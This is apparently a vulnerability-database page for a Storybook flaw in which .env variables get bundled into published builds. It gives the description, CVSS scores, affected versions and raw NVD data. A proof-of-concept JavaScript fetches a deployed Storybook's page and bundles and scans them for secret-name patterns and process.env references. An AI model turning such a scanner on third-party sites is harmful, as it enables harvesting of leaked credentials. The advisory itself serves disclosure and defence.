Security Vulnerability Report
CVE-2025-68429 CVSS 7.3 HIGH

CVE-2025-68429

Published: 2025-12-17 23:16:05
Last Modified: 2026-04-10 17:22:25

Description

Storybook is a frontend workshop for building user interface components and pages in isolation. A vulnerability present starting in versions 7.0.0 and prior to versions 7.6.21, 8.6.15, 9.1.17, and 10.1.10 relates to Storybook’s handling of environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle’s source is viewable, thus potentially exposing those variables to anyone with access. For a project to potentially be vulnerable to this issue, it must build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) and publish the built Storybook to the web. Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with your Storybook are not affected. Users should upgrade their Storybook—on both their local machines and CI environment—to version 7.6.21, 8.6.15, 9.1.17, or 10.1.10 as soon as possible. Maintainers additionally recommend that users audit for any sensitive secrets provided via `.env` files and rotate those keys. Some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. If a project can no longer read necessary environment variable values, either prefix the variables with `STORYBOOK_` or use the `env` property in Storybook’s configuration to manually specify values. In either case, do not include sensitive secrets, as they will be included in the built bundle.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: the score above is the Secondary assessment in the raw record below. The same record also carries a Primary assessment of 5.3 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (confidentiality impact only), and lists the weaknesses CWE-200, CWE-538 and CWE-541.

Configurations (Affected Products)

cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:* - VULNERABLE (Storybook 7.0.0 - 7.6.20)
cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:* - VULNERABLE (Storybook >= 8.0.0, < 8.6.15)
cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:* - VULNERABLE (Storybook >= 9.0.0, < 9.1.17)
cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:* - VULNERABLE (Storybook >= 10.0.0, < 10.1.10)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-68429 PoC - environment variable leak check
// 1. The deployed Storybook page to inspect
const targetUrl = 'https://vulnerable-storybook.example.com';

// 2. Fetch the page source and look for sensitive environment variable name patterns
async function checkEnvLeak(url) {
  const response = await fetch(url);
  const html = await response.text();
  // Common sensitive variable name patterns
  const sensitivePatterns = [/API_KEY/i, /SECRET/i, /PASSWORD/i, /TOKEN/i, /DATABASE/i, /CREDENTIAL/i];
  // Check whether the HTML contains any of the exposed names
  const leaks = sensitivePatterns
    .filter(pattern => pattern.test(html))
    .map(pattern => pattern.source);
  return { vulnerable: leaks.length > 0, exposedVariables: leaks };
}

// 3. Check the JavaScript bundles for environment variable references.
// The original used document.querySelectorAll, which only works inside a browser page;
// here the <script src> tags are extracted from the fetched HTML and resolved against
// the page URL, so the check also runs under Node.
async function checkBundle(url) {
  const response = await fetch(url);
  const html = await response.text();
  // Find main.xxx.js and the other script files the page references
  const jsFiles = [...html.matchAll(/<script[^>]+src=["']([^"']+)["']/gi)]
    .map(match => new URL(match[1], url).href);
  for (const file of jsFiles) {
    const jsContent = await (await fetch(file)).text();
    // Search for environment variable definition patterns
    const envPatterns = [/process\.env\.[A-Z_]+/g, /\.env\.[A-Z_]+/g];
    for (const pattern of envPatterns) {
      const matches = jsContent.match(pattern);
      if (matches) {
        console.log('Potential env leak:', file, matches);
      }
    }
  }
}

checkEnvLeak(targetUrl).then(result => console.log(result));
checkBundle(targetUrl);

References

https://github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6 (Mitigation, Vendor Advisory)
https://storybook.js.org/blog/security-advisory (Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68429", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:16:05.140", "lastModified": "2026-04-10T17:22:25.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Storybook is a frontend workshop for building user interface components and pages in isolation. A vulnerability present starting in versions 7.0.0 and prior to versions 7.6.21, 8.6.15, 9.1.17, and 10.1.10 relates to Storybook’s handling of environment variables defined in a `.env` file, which could, in specific circumstances, lead to those variables being unexpectedly bundled into the artifacts created by the `storybook build` command. When a built Storybook is published to the web, the bundle’s source is viewable, thus potentially exposing those variables to anyone with access. For a project to potentially be vulnerable to this issue, it must build the Storybook (i.e. run `storybook build` directly or indirectly) in a directory that contains a `.env` file (including variants like `.env.local`) and publish the built Storybook to the web. Storybooks built without a `.env` file at build time are not affected, including common CI-based builds where secrets are provided via platform environment variables rather than `.env` files. Storybook runtime environments (i.e. `storybook dev`) are not affected. Deployed applications that share a repo with your Storybook are not affected. Users should upgrade their Storybook—on both their local machines and CI environment—to version .6.21, 8.6.15, 9.1.17, or 10.1.10 as soon as possible. Maintainers additionally recommend that users audit for any sensitive secrets provided via `.env` files and rotate those keys. Some projects may have been relying on the undocumented behavior at the heart of this issue and will need to change how they reference environment variables after this update. 
If a project can no longer read necessary environmental variable values, either prefix the variables with `STORYBOOK_` or use the `env` property in Storybook’s configuration to manually specify values. In either case, do not include sensitive secrets as they will be included in the built bundle."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-538"}, {"lang": "en", "value": "CWE-541"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.6.21", "matchCriteriaId": "5C3CF775-3596-406E-AAAB-B20DFCF70968"}, {"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.6.15", "matchCriteriaId": "48B589F7-CB59-4ECC-A112-E3DFF42736F6"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.17", "matchCriteriaId": "103EF391-CCA5-4A2F-B251-E88C82750702"}, {"vulnerable": true, "criteria": "cpe:2.3:a:storybook:storybook:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.10", "matchCriteriaId": "97591A94-A9AE-419A-AEAA-85882302BB16"}]}]}], "references": [{"url": "https://github.com/storybookjs/storybook/security/advisories/GHSA-8452-54wp-rmv6", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://storybook.js.org/blog/security-advisory", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}